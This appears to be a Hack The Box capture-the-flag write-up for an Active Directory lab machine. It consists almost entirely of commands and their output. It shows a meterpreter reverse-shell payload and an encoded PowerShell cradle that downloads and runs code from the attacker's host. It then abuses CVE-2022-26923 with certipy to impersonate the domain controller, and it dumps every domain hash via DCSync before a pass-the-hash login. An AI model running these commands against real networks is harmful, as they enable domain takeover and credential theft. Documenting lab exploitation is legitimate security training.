Certification
Enumeration:
sudo nmap -sS -sV -Pn -p- -T4 -n --open -A -oA certification-full-sweep 10.129.230.126
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-07-15 16:09:43Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certification.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certification.htb0., Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certification.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certification.htb0., Site: Default-First-Site-Name)
8000/tcp open http-alt
|_http-open-proxy: Proxy might be redirecting requests
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
57496/tcp open msrpc Microsoft Windows RPC
59262/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
64924/tcp open msrpc Microsoft Windows RPC
/home/parallels/.local/bin/poetry run crackmapexec smb 10.129.230.126
SMB 10.129.230.126 445 CFN-SVRDC01 [*] Windows 10.0 Build 20348 x64 (name:CFN-SVRDC01) (domain:certification.htb) (signing:True) (SMBv1:False)
Visit http://10.129.230.126:8000/ and login with admin:admin. http://10.129.230.126:8000/settings/global allows you to define commands that are triggered through different events, e.g., Before Rename.
Preparation:
msfvenom -p windows/x64/meterpreter/reverse_https lhost=tun0 lport=443 exitfunc=thread -f ps1
nano Public/bp-simple-runim64.ps1
echo -n "iex (New-Object System.Net.WebClient).DownloadString('http://10.10.14.43/bp-simple-runim64.ps1')" | iconv --to-code UTF-16LE | base64 -w 0
powershell.exe -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADQALgA0ADMALwBiAHAALQBzAGkAbQBwAGwAZQAtAHIAdQBuAGkAbQA2ADQALgBwAHMAMQAnACkA
cd Public/
sudo python3 -m http.server 80
Now trigger command execution by, for example, renaming a folder (http://10.129.230.126:8000/files/) and receive Meterpreter session.
meterpreter > cat user.txt
HTB{Abu51ng_F34tur3s_4r3_fun}
Nice. Discover user credentials:
meterpreter > cat applist.ps1
$user = "daniel.morgan"
$pass = "FDOnolk(naws)"
Challenge hints to ADCS. A recent vulnerability is presented here:
Enumeration:
certipy find 'certification.htb/daniel.morgan@CFN-SVRDC01.certification.htb'
...
Template Name : Machine
Certificate Authorities : certification-CFN-SVRDC01-CA
Enabled : True
Client Authentication : True
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectRequireDnsAsCn
SubjectAltRequireDns
Enrollment Flag : AutoEnrollment
Extended Key Usage : Client Authentication
Server Authentication
Requires Manager Approval : False
Application Policies :
Authorized Signatures Required : 0
Validity Period : 1 year
Renewal Period : 6 weeks
Permissions
Enrollment Permissions
Enrollment Rights : CERTIFICATION.HTB\Domain Admins
CERTIFICATION.HTB\Domain Computers
CERTIFICATION.HTB\Enterprise Admins
...
Looks good! Exploitation:
sudo nano /etc/hosts
10.129.224.146 CFN-SVRDC01 certification.htb CFN-SVRDC01.certification.htb
(IP address has changed due to reboots)
Create a new machine account wtf$ and use the flag -dns to abuse CVE-2022–26923.
certipy account create 'certification.htb/daniel.morgan@CFN-SVRDC01.certification.htb' -user wtf -dns 'CFN-SVRDC01.certification.htb'
Certipy v3.0.0 - by Oliver Lyak (ly4k)
Password:
[*] Creating new account:
sAMAccountName : wtf$
unicodePwd : J6AeabTzuSGNFElP
userAccountControl : 4096
servicePrincipalName : HOST/wtf
RestrictedKrbHost/wtf
dnsHostName : CFN-SVRDC01.certification.htb
[*] Successfully created account 'wtf$' with password 'J6AeabTzuSGNFElP'
Now request certificate. Only difference to blog post is the flag -dynamic-endpoint (did not work without it).
certipy req 'certification.htb/wtf$:J6AeabTzuSGNFElP@CFN-SVRDC01.certification.htb' -ca certification-CFN-SVRDC01-CA -template Machine -debug -dynamic-endpoint
Certipy v3.0.0 - by Oliver Lyak (ly4k)
[+] Trying to resolve 'CFN-SVRDC01.certification.htb' at '10.211.55.1'
[+] Generating RSA key
[*] Requesting certificate
[+] Trying to resolve dynamic endpoint '91AE6020-9E3C-11CF-8D7C-00AA00C091BE'
[+] Resolved dynamic endpoint '91AE6020-9E3C-11CF-8D7C-00AA00C091BE' to 'ncacn_ip_tcp:10.129.224.146[65389]'
[+] Trying to connect to endpoint: ncacn_ip_tcp:10.129.224.146[65389]
[+] Connected to endpoint: ncacn_ip_tcp:10.129.224.146[65389]
[*] Successfully requested certificate
[*] Request ID is 6
[*] Got certificate with DNS Host Name 'CFN-SVRDC01.certification.htb'
[*] Certificate object SID is None
[*] Saved certificate and private key to 'cfn-svrdc01.pfx'
Use certificate to retrieve NT hash for domain controller:
certipy auth -pfx cfn-svrdc01.pfx -dc-ip 10.129.224.146
Certipy v3.0.0 - by Oliver Lyak (ly4k)
[*] Using principal: cfn-svrdc01$@certification.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'cfn-svrdc01.ccache'
[*] Trying to retrieve NT hash for 'cfn-svrdc01$'
[*] Got NT hash for 'cfn-svrdc01$@certification.htb': d85512d5e138a972140986b9cc664d7a
DCSync:
/home/parallels/.local/bin/poetry run crackmapexec smb 10.129.224.146 -u cfn-svrdc01$ -H d85512d5e138a972140986b9cc664d7a --ntds
SMB 10.129.224.146 445 CFN-SVRDC01 [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.129.224.146 445 CFN-SVRDC01 Administrator:500:aad3b435b51404eeaad3b435b51404ee:30d9a71719214d675de29308730c0cb0:::
SMB 10.129.224.146 445 CFN-SVRDC01 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.224.146 445 CFN-SVRDC01 krbtgt:502:aad3b435b51404eeaad3b435b51404ee:60f1596c192904336a13ffbec1e4a682:::
SMB 10.129.224.146 445 CFN-SVRDC01 daniel.morgan\daniel.morgan:1104:aad3b435b51404eeaad3b435b51404ee:1a6bd44c29ac2b1f6dad125f8833fe50:::
SMB 10.129.224.146 445 CFN-SVRDC01 certification.htb\timothy.newton:2101:aad3b435b51404eeaad3b435b51404ee:403e1f280556b28a91c684240102a0e3:::
SMB 10.129.224.146 445 CFN-SVRDC01 certification.htb\ruth.williams:2102:aad3b435b51404eeaad3b435b51404ee:c510b26a2f8edfd216f613b1f5eb6e3c:::
SMB 10.129.224.146 445 CFN-SVRDC01 certification.htb\nancy.spear:2103:aad3b435b51404eeaad3b435b51404ee:766a0f8cd98d4be3b63782e6428a1b25:::
SMB 10.129.224.146 445 CFN-SVRDC01 certification.htb\robert.patterson:2104:aad3b435b51404eeaad3b435b51404ee:a485150cca1fee22c71fea688188ae1f:::
SMB 10.129.224.146 445 CFN-SVRDC01 certification.htb\nathan.spear:2105:aad3b435b51404eeaad3b435b51404ee:f957fcf75f284a8bb3f685cd0a34ac9f:::
SMB 10.129.224.146 445 CFN-SVRDC01 CFN-SVRDC01$:1000:aad3b435b51404eeaad3b435b51404ee:d85512d5e138a972140986b9cc664d7a:::
SMB 10.129.224.146 445 CFN-SVRDC01 CFN-WKS001$:1103:aad3b435b51404eeaad3b435b51404ee:8a040366cbb7be0816ec65c58ae97bac:::
SMB 10.129.224.146 445 CFN-SVRDC01 SETUPMACHINE$:3601:aad3b435b51404eeaad3b435b51404ee:e55b6e781f9bdc4199dcc7581b7f680c:::
SMB 10.129.224.146 445 CFN-SVRDC01 wtf$:7601:aad3b435b51404eeaad3b435b51404ee:c92817881ec894b7b6a538bf7cb4dbbb:::
Collect flag:
impacket-smbclient -hashes :30d9a71719214d675de29308730c0cb0 administrator@CFN-SVRDC01.certification.htb
# use C$
# cd Users
# cd Administrator
# cd Desktop
# cat root.txt
HTB{c3rtif1c4t35_c4n_8e_f4k3d}
Excellent.